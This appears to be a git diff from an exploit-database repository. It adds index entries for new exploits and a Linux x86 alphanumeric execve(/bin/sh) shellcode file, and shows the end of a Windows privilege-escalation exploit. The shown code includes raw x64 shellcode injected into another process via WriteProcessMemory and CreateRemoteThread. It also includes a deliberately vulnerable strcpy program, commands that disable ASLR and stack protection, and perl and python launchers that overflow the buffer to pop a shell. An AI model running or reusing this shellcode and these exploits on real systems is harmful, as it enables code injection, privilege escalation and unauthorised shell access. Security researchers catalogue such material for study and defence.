// This is a CreateProcess(calc) shellcode generated with scc, see payload.cc.
|
||||||
|
//
|
||||||
|
|
||||||
|
const uint8_t Shellcode[] {
|
||||||
|
0x48, 0x83, 0xc4, 0x08, 0x48, 0x83, 0xe4, 0xf0, 0x48, 0x83, 0xec, 0x08, 0x55, 0x48, 0x8b, 0xec,
|
||||||
|
0x48, 0x8d, 0x64, 0x24, 0xf0, 0x48, 0x8d, 0x05, 0x42, 0x02, 0x00, 0x00, 0x48, 0x89, 0x45, 0xf0,
|
||||||
|
0x6a, 0x00, 0x8f, 0x45, 0xf8, 0x48, 0x8d, 0x05, 0x3a, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x08, 0x48,
|
||||||
|
0x8d, 0x55, 0xf0, 0xe8, 0x63, 0x01, 0x00, 0x00, 0xe8, 0xbf, 0x01, 0x00, 0x00, 0xc9, 0xc3, 0x53,
|
||||||
|
0x56, 0x57, 0x41, 0x54, 0x55, 0x48, 0x8b, 0xec, 0x6a, 0x60, 0x58, 0x65, 0x48, 0x8b, 0x00, 0x48,
|
||||||
|
0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0x8b, 0x46, 0x30, 0x48, 0x83, 0xf8, 0x00, 0x74,
|
||||||
|
0x13, 0xeb, 0x08, 0x4c, 0x8b, 0x06, 0x49, 0x8b, 0xf0, 0xeb, 0xec, 0x45, 0x33, 0xdb, 0x66, 0x45,
|
||||||
|
0x33, 0xd2, 0xeb, 0x09, 0x33, 0xc0, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x66, 0x8b, 0x46,
|
||||||
|
0x58, 0x66, 0x44, 0x3b, 0xd0, 0x72, 0x11, 0xeb, 0x3c, 0x66, 0x45, 0x8b, 0xc2, 0x66, 0x41, 0x83,
|
||||||
|
0xc0, 0x02, 0x66, 0x45, 0x8b, 0xd0, 0xeb, 0xe5, 0x45, 0x8b, 0xcb, 0x41, 0xc1, 0xe9, 0x0d, 0x41,
|
||||||
|
0x8b, 0xc3, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc8, 0x41, 0x8b, 0xc1, 0x4c, 0x8b, 0x46, 0x60, 0x45,
|
||||||
|
0x0f, 0xb7, 0xca, 0x4d, 0x03, 0xc1, 0x45, 0x8a, 0x00, 0x45, 0x0f, 0xbe, 0xc0, 0x41, 0x83, 0xf8,
|
||||||
|
0x61, 0x72, 0x15, 0xeb, 0x07, 0x41, 0x3b, 0xcb, 0x74, 0x16, 0xeb, 0x97, 0x41, 0x83, 0xe8, 0x20,
|
||||||
|
0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xb1, 0x41, 0x03, 0xc0, 0x44, 0x8b, 0xd8, 0xeb, 0xa9,
|
||||||
|
0x4c, 0x8b, 0x56, 0x30, 0x41, 0x8b, 0x42, 0x3c, 0x4d, 0x8b, 0xe2, 0x4c, 0x03, 0xe0, 0x41, 0x8b,
|
||||||
|
0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x4d, 0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x33, 0xdb, 0x41,
|
||||||
|
0x8b, 0x41, 0x18, 0x44, 0x3b, 0xd8, 0x72, 0x0b, 0xe9, 0x56, 0xff, 0xff, 0xff, 0x41, 0x83, 0xc3,
|
||||||
|
0x01, 0xeb, 0xec, 0x41, 0x8b, 0x41, 0x20, 0x49, 0x8b, 0xda, 0x48, 0x03, 0xd8, 0x45, 0x8b, 0xc3,
|
||||||
|
0x48, 0x8b, 0xc3, 0x4a, 0x8d, 0x04, 0x80, 0x8b, 0x00, 0x49, 0x8b, 0xfa, 0x48, 0x03, 0xf8, 0x33,
|
||||||
|
0xc0, 0x48, 0x8b, 0xdf, 0x48, 0x83, 0xc7, 0x01, 0x44, 0x8a, 0x03, 0x41, 0x0f, 0xbe, 0xd8, 0x83,
|
||||||
|
0xfb, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x3b, 0xd0, 0x74, 0x17, 0xeb, 0xc1, 0x44, 0x8b, 0xc0, 0x41,
|
||||||
|
0xc1, 0xe8, 0x0d, 0xc1, 0xe0, 0x13, 0x44, 0x0b, 0xc0, 0x44, 0x03, 0xc3, 0x41, 0x8b, 0xc0, 0xeb,
|
||||||
|
0xd0, 0x41, 0x8b, 0x41, 0x1c, 0x49, 0x8b, 0xd2, 0x48, 0x03, 0xd0, 0x41, 0x8b, 0x41, 0x24, 0x4d,
|
||||||
|
0x8b, 0xca, 0x4c, 0x03, 0xc8, 0x45, 0x8b, 0xc3, 0x49, 0x8b, 0xc1, 0x4a, 0x8d, 0x04, 0x40, 0x66,
|
||||||
|
0x8b, 0x00, 0x0f, 0xb7, 0xc8, 0x48, 0x8b, 0xc2, 0x48, 0x8d, 0x04, 0x88, 0x8b, 0x00, 0x4c, 0x03,
|
||||||
|
0xd0, 0x49, 0x8b, 0xc2, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x53, 0x56, 0x57, 0x41, 0x54,
|
||||||
|
0x55, 0x48, 0x8b, 0xec, 0x48, 0x8b, 0xf1, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0x03, 0x48, 0x83, 0xf8,
|
||||||
|
0x00, 0x74, 0x0e, 0x48, 0x8b, 0xc6, 0x48, 0x83, 0xc6, 0x04, 0x44, 0x8b, 0x20, 0x33, 0xff, 0xeb,
|
||||||
|
0x07, 0xc9, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0xc3, 0x8b, 0x06, 0x41, 0x8b, 0xcc, 0x8b, 0xd0, 0xe8,
|
||||||
|
0x6b, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0xd0, 0x48, 0x83, 0xfa, 0x00, 0x74, 0x02, 0xeb, 0x06, 0x48,
|
||||||
|
0x83, 0xc3, 0x08, 0xeb, 0xc5, 0x48, 0x8b, 0x03, 0x48, 0x8b, 0xcf, 0x48, 0x83, 0xc7, 0x01, 0x48,
|
||||||
|
0x8d, 0x04, 0xc8, 0x48, 0x89, 0x10, 0x48, 0x83, 0xc6, 0x04, 0xeb, 0xcc, 0x57, 0x55, 0x48, 0x8b,
|
||||||
|
0xec, 0x48, 0x8d, 0xa4, 0x24, 0x78, 0xff, 0xff, 0xff, 0x48, 0x8d, 0xbd, 0x78, 0xff, 0xff, 0xff,
|
||||||
|
0x32, 0xc0, 0x6a, 0x68, 0x59, 0xf3, 0xaa, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x68, 0x00, 0x00,
|
||||||
|
0x00, 0x48, 0x8d, 0x05, 0x4a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x10, 0x4c, 0x8d, 0x95, 0x78, 0xff,
|
||||||
|
0xff, 0xff, 0x48, 0x8d, 0x45, 0xe0, 0x33, 0xc9, 0x45, 0x33, 0xc0, 0x45, 0x33, 0xc9, 0x50, 0x41,
|
||||||
|
0x52, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x6a, 0x00, 0x48, 0x8d, 0x64, 0x24, 0xe0, 0x48, 0x8d,
|
||||||
|
0x05, 0x09, 0x00, 0x00, 0x00, 0xff, 0x10, 0x48, 0x83, 0xc4, 0x50, 0xc9, 0x5f, 0xc3, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x17, 0xca, 0x2b, 0x6e, 0x72, 0xfe, 0xb3, 0x16, 0x00, 0x00,
|
||||||
|
0x00, 0x00, 0x63, 0x61, 0x6c, 0x63, 0x00
|
||||||
|
};
|
||||||
|
|
||||||
|
if(!WriteProcessMemory(
|
||||||
|
ProcessHandle,
|
||||||
|
ShellcodeAddress,
|
||||||
|
Shellcode,
|
||||||
|
sizeof(Shellcode),
|
||||||
|
nullptr
|
||||||
|
)) {
|
||||||
|
printf("Failed to WriteProcessMemory in the target process (%d) bailing out.", GetLastError());
|
||||||
|
|
||||||
|
//
|
||||||
|
// At least clean up the remote process D:
|
||||||
|
//
|
||||||
|
|
||||||
|
VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE);
|
||||||
|
return EXIT_FAILURE;
|
||||||
|
}
|
||||||
|
|
||||||
|
//
|
||||||
|
// Creating a remote thread on the shellcode now.
|
||||||
|
//
|
||||||
|
|
||||||
|
DWORD ThreadId;
|
||||||
|
HANDLE ThreadHandle = CreateRemoteThread(
|
||||||
|
ProcessHandle,
|
||||||
|
nullptr,
|
||||||
|
0,
|
||||||
|
ShellcodeAddress,
|
||||||
|
nullptr,
|
||||||
|
0,
|
||||||
|
&ThreadId
|
||||||
|
);
|
||||||
|
|
||||||
|
//
|
||||||
|
// Waiting for the thread to end..
|
||||||
|
//
|
||||||
|
|
||||||
|
WaitForSingleObject(ThreadHandle, INFINITE);
|
||||||
|
|
||||||
|
//
|
||||||
|
// All right, we are done here, let's clean up and exit.
|
||||||
|
//
|
||||||
|
|
||||||
|
VirtualFreeEx(ProcessHandle, ShellcodeAddress, 0, MEM_RELEASE);
|
||||||
|
printf("Payload has been successfully injected in %d.", SihostPid);
|
||||||
|
return EXIT_SUCCESS;
|
||||||
|
}
|
|
@ -6627,6 +6627,26 @@ id,file,description,date,author,type,platform,port
|
||||||
47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
|
47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
|
||||||
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
|
47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
|
||||||
47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
|
47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
|
||||||
|
47848,exploits/windows/dos/47848.py,"NetShareWatcher 1.5.8.0 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47853,exploits/windows/dos/47853.py,"NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47855,exploits/windows/dos/47855.py,"SpotIE 2.9.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47856,exploits/windows/dos/47856.py,"Dnss Domain Name Search Software - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47857,exploits/windows/dos/47857.py,"BlueAuditor 1.7.2.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47859,exploits/windows/dos/47859.py,"ShareAlarmPro Advanced Network Access Control - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47860,exploits/windows/dos/47860.py,"NetShareWatcher 1.5.8.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47861,exploits/windows/dos/47861.py,"Dnss Domain Name Search Software - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47862,exploits/windows/dos/47862.py,"TextCrawler Pro3.1.1 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
|
||||||
|
47863,exploits/windows/dos/47863.py,"RemShutdown 2.9.0.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47864,exploits/windows/dos/47864.py,"Backup Key Recovery Recover Keys Crashed Hard Disk Drive 2.2.5 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47865,exploits/windows/dos/47865.py,"RemShutdown 2.9.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47866,exploits/windows/dos/47866.py,"NBMonitor 1.6.6.0 - 'Key' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47867,exploits/windows/dos/47867.py,"Office Product Key Finder 1.5.4 - Denial of Service (PoC)",2020-01-06,Gokkulraj,dos,windows,
|
||||||
|
47868,exploits/windows/dos/47868.py,"SpotFTP FTP Password Recovery 3.0.0.0 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47869,exploits/windows/dos/47869.py,"SpotMSN 2.4.6 - 'Name' Denial of Service (PoC)",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47870,exploits/windows/dos/47870.py,"SpotIM 2.2 - 'Name' Denial Of Service",2020-01-06,"Ismail Tasdelen",dos,windows,
|
||||||
|
47871,exploits/windows/dos/47871.txt,"FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)",2020-01-06,FULLSHADE,dos,windows,
|
||||||
|
47873,exploits/windows/dos/47873.py,"Duplicate Cleaner Pro 4 - Denial of Service (PoC)",2020-01-06,stresser,dos,windows,
|
||||||
|
47878,exploits/windows/dos/47878.txt,"Microsoft Outlook VCF cards - Denial of Service (PoC)",2020-01-06,hyp3rlinx,dos,windows,
|
||||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||||
|
@ -10862,6 +10882,8 @@ id,file,description,date,author,type,platform,port
|
||||||
47830,exploits/freebsd/local/47830.sh,"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
|
47830,exploits/freebsd/local/47830.sh,"FreeBSD-SA-19:15.mqueuefs - Privilege Escalation",2019-12-30,"Karsten König",local,freebsd,
|
||||||
47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,
|
47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,
|
||||||
47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,
|
47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows,
|
||||||
|
47852,exploits/windows/local/47852.txt,"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path",2020-01-06,ZwX,local,windows,
|
||||||
|
47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows,
|
||||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||||
|
@ -42150,3 +42172,13 @@ id,file,description,date,author,type,platform,port
|
||||||
47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,
|
47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,
|
||||||
47843,exploits/php/webapps/47843.txt,"Online Course Registration 2.0 - Remote Code Execution",2020-01-03,"Metin Yunus Kandemir",webapps,php,
|
47843,exploits/php/webapps/47843.txt,"Online Course Registration 2.0 - Remote Code Execution",2020-01-03,"Metin Yunus Kandemir",webapps,php,
|
||||||
47844,exploits/php/webapps/47844.txt,"Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection",2020-01-03,"Hakan TAŞKÖPRÜ",webapps,php,
|
47844,exploits/php/webapps/47844.txt,"Karakuzu ERP Management Web 5.7.0 - 'k_adi_duz' SQL Injection",2020-01-03,"Hakan TAŞKÖPRÜ",webapps,php,
|
||||||
|
47846,exploits/php/webapps/47846.txt,"Dairy Farm Shop Management System 1.0 - 'username' SQL Injection",2020-01-06,"Chris Inzinga",webapps,php,
|
||||||
|
47847,exploits/php/webapps/47847.txt,"Complaint Management System 4.0 - 'cid' SQL injection",2020-01-06,FULLSHADE,webapps,php,
|
||||||
|
47850,exploits/hardware/webapps/47850.txt,"IBM RICOH Infoprint 1532 Printer - Persistent Cross-Site Scripting",2020-01-06,"Ismail Tasdelen",webapps,hardware,
|
||||||
|
47851,exploits/php/webapps/47851.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)",2020-01-06,"Ismail Tasdelen",webapps,php,
|
||||||
|
47854,exploits/php/webapps/47854.txt,"Hostel Management System 2.0 - 'id' SQL Injection",2020-01-06,FULLSHADE,webapps,php,
|
||||||
|
47858,exploits/php/webapps/47858.txt,"elaniin CMS 1.0 - Authentication Bypass",2020-01-06,riamloo,webapps,php,
|
||||||
|
47874,exploits/php/webapps/47874.txt,"Small CRM 2.0 - Authentication Bypass",2020-01-06,FULLSHADE,webapps,php,
|
||||||
|
47875,exploits/php/webapps/47875.txt,"Voyager 1.3.0 - Directory Traversal",2020-01-06,NgoAnhDuc,webapps,php,
|
||||||
|
47876,exploits/php/webapps/47876.txt,"Codoforum 4.8.3 - Persistent Cross-Site Scripting",2020-01-06,Prasanth,webapps,php,
|
||||||
|
47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python,
|
||||||
|
|
Can't render this file because it is too large.
|
|
@ -1010,3 +1010,4 @@ id,file,description,date,author,type,platform
|
||||||
47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux
|
47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux
|
||||||
47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux
|
47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux
|
||||||
47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
|
47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
|
||||||
|
47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux
|
||||||
|
|
|
109
shellcodes/linux/47877.c
Normal file
109
shellcodes/linux/47877.c
Normal file
|
@ -0,0 +1,109 @@
|
||||||
|
# Title: Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)
|
||||||
|
# Date: 2019-12-31
|
||||||
|
# Shellcode Author: bolonobolo
|
||||||
|
# Tested on: Linux x86
|
||||||
|
|
||||||
|
######################## execve.asm ###############################
|
||||||
|
global _start
|
||||||
|
|
||||||
|
section .text
|
||||||
|
_start:
|
||||||
|
|
||||||
|
; int 0x80 ------------
|
||||||
|
push 0x30
|
||||||
|
pop eax
|
||||||
|
xor al, 0x30
|
||||||
|
push eax
|
||||||
|
pop edx
|
||||||
|
dec eax
|
||||||
|
xor ax, 0x4f73
|
||||||
|
xor ax, 0x3041
|
||||||
|
push eax
|
||||||
|
push edx
|
||||||
|
pop eax
|
||||||
|
;----------------------
|
||||||
|
push edx
|
||||||
|
push 0x68735858
|
||||||
|
pop eax
|
||||||
|
xor ax, 0x7777
|
||||||
|
push eax
|
||||||
|
push 0x30
|
||||||
|
pop eax
|
||||||
|
xor al, 0x30
|
||||||
|
xor eax, 0x6e696230
|
||||||
|
dec eax
|
||||||
|
push eax
|
||||||
|
|
||||||
|
; pushad/popad to place /bin/sh in EBX register
|
||||||
|
push esp
|
||||||
|
pop eax
|
||||||
|
push edx
|
||||||
|
push ecx
|
||||||
|
push ebx
|
||||||
|
push eax
|
||||||
|
push esp
|
||||||
|
push ebp
|
||||||
|
push esi
|
||||||
|
push edi
|
||||||
|
popad
|
||||||
|
push eax
|
||||||
|
pop ecx
|
||||||
|
push ebx
|
||||||
|
|
||||||
|
xor al, 0x4a
|
||||||
|
xor al, 0x41
|
||||||
|
|
||||||
|
######################## ASCII string ##########################
|
||||||
|
|
||||||
|
j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A
|
||||||
|
|
||||||
|
########################## bof.c ####################
|
||||||
|
|
||||||
|
#include <stdlib.h>
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
int main(int argc, char *argv[]){
|
||||||
|
char buffer[128];
|
||||||
|
strcpy(buffer, argv[1]);
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
When you test it on new kernels remember to disable the
|
||||||
|
randomize_va_space and to compile the C program with execstack enabled
|
||||||
|
and the stack protector disabled
|
||||||
|
|
||||||
|
# bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf'
|
||||||
|
# sysctl -p
|
||||||
|
# gcc -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -g
|
||||||
|
bof.c -o bof
|
||||||
|
|
||||||
|
|
||||||
|
###################################################################
|
||||||
|
|
||||||
|
./bof `perl -e 'print "\x90"x48 .
|
||||||
|
"j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A" .
|
||||||
|
"D"x16 . "\xff\xe4" . "\x79\xf7\xff\xbf"'`
|
||||||
|
|
||||||
|
The \x79\xf7\xff\xbf may change, you must find yourself an address in
|
||||||
|
the NOP befor the shellcode
|
||||||
|
|
||||||
|
#################### alpha.py ############################
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
import os
|
||||||
|
|
||||||
|
print "[*] Loading NOP"
|
||||||
|
z = "\x90"*48
|
||||||
|
print "[*] Loading alphanumeric"
|
||||||
|
z += "j0X40PZHf5sOf5A0PRXRj0X40hXXshXf5wwPj0X4050binHPTXRQSPTUVWaPYS4J4A"
|
||||||
|
print "[*] Loading syscall"
|
||||||
|
z += "D"*16
|
||||||
|
print "[*] Loading JMP and landing address"
|
||||||
|
z += "\xff\xe4\x79\xf7\xff\xbf"
|
||||||
|
print "[*] Popping the shell..."
|
||||||
|
os.system("./bof " + z)
|
||||||
|
|
||||||
|
|
||||||
|
##################################################################
|
Loading…
Add table
Reference in a new issue